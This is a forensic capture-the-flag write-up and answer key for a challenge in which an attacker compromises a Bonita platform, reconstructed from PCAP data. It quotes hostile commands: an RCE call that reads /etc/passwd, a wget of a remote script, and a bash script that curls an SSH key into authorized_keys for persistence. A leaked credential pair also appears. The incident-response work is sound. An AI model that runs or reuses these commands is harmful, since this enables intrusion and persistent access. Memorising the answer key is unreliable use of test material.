# Meerkat
Easy

**Scenario**:  
As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren't the most security aware. As our new security provider we'd like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.

## Evidence

### Attack discovered
1. Password bruteforce attack evident, many login requests attempted untill successfull login occurs
    - POST requests directed at `http://forela.co.uk:8080/bonita/loginservice`
    - Packet 2158 is the start of the bruteforce
    - Packet 2900 is the first authenticated credential  
        `username=seb.broom%40forela.co.uk`  
        `password=g0vernm3nt`
1. Attacker uploads a file to the application
    - Packet 2918
    - `rce_api_extension.zip` contains JAR file `resourceNameRestAPI-1.0.0-SNAPSHOT.jar`
1. Attacker accesses the extension via web UI to verify functionality
    - Packet 2925
1. Attacker launches attack
    - Packet 2931
    - GET request to `/bonita/API/extension/rce?p=0&c=1&cmd=whoami`
1. Attacker accesses the extension via web UI to verify functionality
    - Packet 2925
1. Attacker tries to download `/etc/passwd`
    - Packet 3586
    - `/bonita/API/extension/rce?p=0&c=1&cmd=cat%20/etc/passwd`
1. Attacker downloads remote file onto server
    - Packet 3652
    - `http://forela.co.uk:8080/bonita/API/extension/rce?p=0&c=1&cmd=wget%20https://pastes.io/raw/bx5gcr0et8`
    - `https://pastes.io/raw/bx5gcr0et8` - Downloads a bash script  
        ```
        #!/bin/bash
        curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
        sudo service ssh restart
        ```  
    - `https://pastes.io/raw/hffgra4unv` - in turn downlads a SSH key  
        ```
        ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgruRMq3DMroGXrcPeeuEqQq3iS/sAL3gryt+nUqbBA/M+KG4ElCvJS4gP2os1b8FMk3ZwvrVTdpEKW6wdGqPl2wxznBjOBstx6OF2yp9RIOb3c/ezgs9zvnaO07YC8Sm4nkkXHgkabqcM7rHEY4Lay0LWF9UbxueSAHIJgQ2ADbKSnlg0gMnJTNRwKbqesk0ZcG3b6icj6nkKykezBLvWc7z4mkSm28ZVTa15W3HUWSEWRbGgJ6eMBdi7WnWXZ92SYDq0XUBV2Sx2gjoDGHwcd6I0q9BU52wWYo3L3LaPEoTcLuA+hnn82086oUzJfmEUtWGlPAXfJBN7vRIMSvsN
        ```

In [ ]:
import json
with open("logins.json") as login_file:
    logins = json.load(login_file)
credentials = []
for login in logins:
    data = login["_source"]["layers"]["urlencoded-form"]
    username = ""
    password = ""
    for key,val in data.items():
          if val["urlencoded-form.key"] == "username":
               username = val["urlencoded-form.value"]
          if val["urlencoded-form.key"] == "password":
               password = val["urlencoded-form.value"]
    credentials.append(f"{username} {password}")
    
print(credentials)
print(list(set(credentials)))
print(len(list(set(credentials))))

In [ ]:
import json
with open("meerkat-alerts.json") as alert_file:
    alerts = json.load(alert_file)
for alert in alerts:
    if "alert" not in alert:
        print(alert.keys())
        print(alert["server_name"])
    else:
        print(alert["alert"].keys())

---
## Answers
---

- Task 1 - We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?
    - BonitaSoft
- Task 2 - We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?
    - Credential Stuffing
- Task 3 - Does the vulnerability exploited have a CVE assigned - and if so, which one?
    - CVE-2022-25237
- Task 4 - Which string was appended to the API URL path to bypass the authorization filter by the attacker's exploit?
    - i18ntranslation
- Task 5 - How many combinations of usernames and passwords were used in the credential stuffing attack?
    - 56
- Task 6 - Which username and password combination was successful?
    - seb.broom@forela.co.uk:g0vernm3nt
- Task 7 - If any, which text sharing site did the attacker utilise?
    - pastes.io
- Task 8 - Please provide the file hash of the script used by the attacker to gain persistent access to our host.
    - 0dc54416c346584539aa985e9d69a98e
- Task 9 - Please provide the file hash of the public key used by the attacker to gain persistence on our host.
    - dbb906628855a433d70025b6692c05e7
- Task 10 - Can you confirmed the file modified by the attacker to gain persistence?
    - /home/ubuntu/.ssh/authorized_keys
- Task 11 - Can you confirm the MITRE technique ID of this type of persistence mechanism?
    - T1098.004
